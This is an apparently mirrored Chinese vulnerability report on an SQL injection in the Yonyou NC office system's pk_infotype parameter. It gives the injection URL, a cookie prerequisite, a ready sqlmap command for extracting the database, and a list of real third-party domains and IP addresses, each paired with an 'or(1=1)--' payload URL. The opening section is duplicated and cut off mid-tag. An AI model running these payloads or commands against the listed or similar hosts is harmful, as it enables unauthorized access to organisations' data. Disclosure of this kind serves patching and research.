VULHUB ™

### 简要描述： RT ### 详细说明： ``` 用友NC综合办公系统SQL注入漏洞，可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库 注入链接：/epp/detail/publishinfomore.jsp?pk_infotype= 注入参数：pk_infotype 必须先访问/epp/index.jsp后产生cookie才能进行SQL注入 ``` ### 漏洞证明： ``` 测试案例： http://nc.xhlbdc.com ``` [<img src="https://images.seebug.org/upload/201501/291647394de20e64b89546e8a10e91244bf10e8f.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/291647394de20e64b89546e8a10e91244bf10e8f.png) ``` 访问首页产生cookie： http://nc.xhlbdc.com/epp/index.jsp ``` [<img src="https://images.seebug.org/upload/201501/29164729bdad1961a464c490c1d6c97bf077fa70.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29164729bdad1961a464c490c1d6c97bf077fa70.png) ``` 注入链接：http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW' ``` [<img src="https://images.seebug.org/upload/201501/29164722801cdc5ef7585e76567d6061c411a234.png" alt="2.png"...

### 简要描述： RT ### 详细说明： ``` 用友NC综合办公系统SQL注入漏洞，可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库 注入链接：/epp/detail/publishinfomore.jsp?pk_infotype= 注入参数：pk_infotype 必须先访问/epp/index.jsp后产生cookie才能进行SQL注入 ``` ### 漏洞证明： ``` 测试案例： http://nc.xhlbdc.com ``` [<img src="https://images.seebug.org/upload/201501/291647394de20e64b89546e8a10e91244bf10e8f.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/291647394de20e64b89546e8a10e91244bf10e8f.png) ``` 访问首页产生cookie： http://nc.xhlbdc.com/epp/index.jsp ``` [<img src="https://images.seebug.org/upload/201501/29164729bdad1961a464c490c1d6c97bf077fa70.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29164729bdad1961a464c490c1d6c97bf077fa70.png) ``` 注入链接：http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW' ``` [<img src="https://images.seebug.org/upload/201501/29164722801cdc5ef7585e76567d6061c411a234.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29164722801cdc5ef7585e76567d6061c411a234.png) ``` 【SQLMAP注入】 burpsuite抓包保存为nc.xhlbdc.com.txt文件后，使用SQLMAP注入： python sqlmap.py -r /c/nc.xhlbdc.com.txt -p pk_infotype --level 5 --risk 3 --dbms oracle --batch --random-agent --technique=T --current-db -v 3 ``` [<img src="https://images.seebug.org/upload/201501/29164715409641c458a20a656db4c5bcff94af89.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/29164715409641c458a20a656db4c5bcff94af89.png) ``` 其他测试案例： http://erp.minyoun.com/epp/index.jsp http://erp.minyoun.com/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)-- http://nc.xhlbdc.com/epp/index.jsp http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)-- http://221.237.157.190/epp/index.jsp http://221.237.157.190/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)-- http://119.2.10.186/epp/index.jsp http://119.2.10.186/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)-- http://nc.pinggugroup.com:81/epp/index.jsp http://nc.pinggugroup.com:81/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)-- http://61.175.97.50/epp/index.jsp http://61.175.97.50/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)-- http://218.75.95.158:8081/epp/index.jsp http://218.75.95.158:8081/epp/detail/publishinfomore.jsp?pk_infotype=1111'+or(1=1)-- ```